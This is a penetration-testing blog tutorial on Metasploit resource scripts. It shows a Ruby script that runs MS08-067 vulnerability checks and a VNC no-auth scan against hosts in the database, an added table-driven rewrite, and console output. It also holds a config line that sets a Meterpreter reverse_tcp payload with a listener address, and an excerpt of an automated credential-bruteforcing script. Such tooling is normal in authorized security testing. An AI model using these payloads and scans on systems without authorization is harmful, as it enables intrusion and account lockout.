Writing resource scripts for the Metasploit Framework

In December I purchased the SMFE certification course from SecurityTube trainer Vivek Ramachandran. While watching the training videos, I started thinking of ways to speed up processes during a pentest engagement. With the default install of Metasploit 4.2 you get PostgreSQL database support. With it you can import third-party vulnerability scan reports, import Nmap XML scans, add hosts manually, or run the db_nmap command, which adds the discovered hosts and services to the database directly. In the event I didn't import a vulnerability scan into the database, I wanted a way to check the database's list of hosts for easily exploitable vulnerabilities. I checked with Carlos Perez (darkoperator) and confirmed that resource scripts were the way to go. I couldn't find much in the way of API documentation for these; my only source seemed to be the resource folder inside the scripts folder. There is enough code in each of those scripts that I was able to figure out how to accomplish what I wanted. Basically there are two ways I could go about creating these scripts:

1. Create a command-by-command .rc file, one console command per line.

root@bt:~/.msf4# cat msfconsole.rc
set PAYLOAD windows/meterpreter/reverse_tcp
setg LHOST 10.10.200.40
set AutoRunScript post/windows/manage/migrate

2. Create a scripted file (Ruby inside <ruby> tags) that leverages data in the datastore or the database of hosts.

root@bt:/opt/metasploit/msf3/scripts/resource# cat auto_brute.rc
# auto_brute.rc
# Author: m-1-k-3 (Web: http://www.s3cur1ty.de / Twitter: @s3cur1ty_de)

# This Metasploit RC-File could be used to automate the bruteforce process
# the services are used from the already discovered service details of the database
# for this we need the service names in the db!
# VERBOSE is used from the global datastore
# THREADS is used from the global datastore
# USER_FILE and PASS_FILE are used from the global datastore

# WARNING: You could lock out users with this resource script!

#throttling if we get too much jobs
maxjobs = 8

wordlistpath = "#{Msf::Config.install_root}/data/wordlists"

if (framework.datastore['USER_FILE'] == nil)
# we are using the default unix wordlists
run_single("setg USER_FILE #{wordlistpath}/unix_users.txt")
end

I went with option 2 because I needed to access data located in the database of hosts. The script I am providing can be extended quite easily to leverage more auxiliary modules or exploits.

<ruby>
# Walk every host in the database, then every service recorded for that host.
framework.db.hosts.each do |h|
  h.services.each do |serv|
    # SMB on a Windows XP / .NET Server / 2003 box: run the ms08_067 check
    # (dot escaped so ".NET Server" is matched literally)
    if serv.port == 445 and h.os_flavor =~ /XP|\.NET Server|2003/i
      print_good("#{h.address} seems to be Windows #{h.os_flavor}...")
      self.run_single("use exploit/windows/smb/ms08_067_netapi")
      print_good("Running ms08_067_netapi check against #{h.address}")
      self.run_single("set RHOST #{h.address}")
      # exploit modules take RHOST and expose 'check', which probes without exploiting
      self.run_single("check")

    # VNC on a Linux box: run the no-auth scanner
    elsif serv.port == 5900 and h.os_name =~ /Linux/i
      print_good("#{h.address} seems to be Linux #{h.os_flavor}...")
      self.run_single("use auxiliary/scanner/vnc/vnc_none_auth")
      print_good("Running VNC no auth check against #{h.os_flavor}")
      self.run_single("set RHOSTS #{h.address}")
      # auxiliary scanner modules take RHOSTS and have no 'check'; 'run' executes them
      self.run_single("run")
    end
  end
end
</ruby>

To run this file launch msfconsole and at the prompt type:

msf > resource /root/checkvulns.rc

I have the file located in the root folder. It can also be placed in the scripts/resource folder. Here is the output of the script:

msf  exploit(ms08_067_netapi) > resource /root/checkvulns.rc
[*] Processing /root/checkvulns.rc for ERB directives.
[*] resource (/root/checkvulns.rc)> Ruby Code (829 bytes)
[+] 10.10.101.3 seems to be Windows .NET Server...
[+] Running ms08_067_netapi check against 10.10.101.3
RHOST => 10.10.101.3

[*] Verifying vulnerable status... (path: 0x0000005a)
[+] The target is vulnerable.
[+] 10.10.101.5 seems to be Linux Ubuntu...
[+] Running VNC no auth check against Ubuntu
RHOSTS => 10.10.101.5
[*] 10.10.101.5:5900, VNC server protocol version : 3.7
[*] 10.10.101.5:5900, VNC server security types supported : TLS,VNC
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
[+] 10.10.101.11 seems to be Windows XP...
[+] Running ms08_067_netapi check against 10.10.101.11
RHOST => 10.10.101.11
[*] Verifying vulnerable status... (path: 0x0000005a)
[+] The target is vulnerable.
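A table-driven version of the same idea, as an added example (not code from this post or from the Metasploit project): the port/OS/module mapping lives in one table, so adding another auxiliary module or exploit is one more row rather than another elsif; services the database does not record as open are skipped; and the planning logic is separated from the console glue, so the list of commands can be checked outside msfconsole before anything is run. The db fields and console helpers it relies on (framework.db.hosts, h.services, serv.port, serv.state, h.os_name, h.os_flavor, run_single) are assumed to be the ones the script above uses; the sample host records are constructed, not real scan data.

```ruby
# checkvulns_table.rb -- an added example, not the script from the post.
# Host/service fields (address, os_name, os_flavor, services, port, state)
# and console helpers (framework, run_single) are assumed from the post's
# <ruby> block; everything else is plain Ruby so the planning logic can be
# exercised outside msfconsole.

# One row per check: which port, which OS pattern, which module, and whether
# the module takes RHOST (exploit, 'check') or RHOSTS (scanner, 'run').
CHECKS = [
  { port: 445,  os: /XP|\.NET Server|2003/i,
    mod: 'exploit/windows/smb/ms08_067_netapi', opt: 'RHOST',  action: 'check' },
  { port: 5900, os: /Linux/i,
    mod: 'auxiliary/scanner/vnc/vnc_none_auth', opt: 'RHOSTS', action: 'run' },
].freeze

# Console commands for one host. Only services the db recorded as open are
# considered, so a closed or filtered port never triggers a module.
def plan_for_host(host, checks = CHECKS)
  os_string = "#{host.os_name} #{host.os_flavor}"
  cmds = []
  host.services.each do |svc|
    next unless svc.state.to_s == 'open'
    checks.each do |c|
      next unless svc.port == c[:port] && os_string =~ c[:os]
      cmds << "use #{c[:mod]}"
      cmds << "set #{c[:opt]} #{host.address}"
      cmds << c[:action]
    end
  end
  cmds
end

# The same over every host in the database, in db order.
def plan(hosts, checks = CHECKS)
  hosts.flat_map { |h| plan_for_host(h, checks) }
end

# Constructed stand-ins for framework.db.hosts (not real scan data), shaped
# like the records the post's script reads.
SampleHost    = Struct.new(:address, :os_name, :os_flavor, :services)
SampleService = Struct.new(:port, :state)

def sample_hosts
  [
    SampleHost.new('10.10.101.3', 'Microsoft Windows', '.NET Server',
                   [SampleService.new(445, 'open'), SampleService.new(5900, 'closed')]),
    SampleHost.new('10.10.101.5', 'Linux', 'Ubuntu',
                   [SampleService.new(5900, 'open')]),
    # Windows 7 with 445 open matches no row, so nothing is run against it.
    SampleHost.new('10.10.101.7', 'Microsoft Windows', '7',
                   [SampleService.new(445, 'open')]),
  ]
end

# Inside an .rc <ruby> block, `framework` and `run_single` exist and the plan
# is fed to the console; run as a plain script, it only prints the plan.
if defined?(framework) && respond_to?(:run_single, true)
  plan(framework.db.hosts).each { |cmd| run_single(cmd) }
else
  puts plan(sample_hosts)
end
```

Wrap the code in <ruby> ... </ruby> in an .rc file and load it with resource as above; running it with plain ruby first shows exactly which use/set/check or run commands it would issue. The caveat from the auto_brute.rc header applies here too: check on ms08_067_netapi only verifies vulnerable status, but run on a scanner module connects to the service, so review the plan before pointing it at hosts you are not authorized to test.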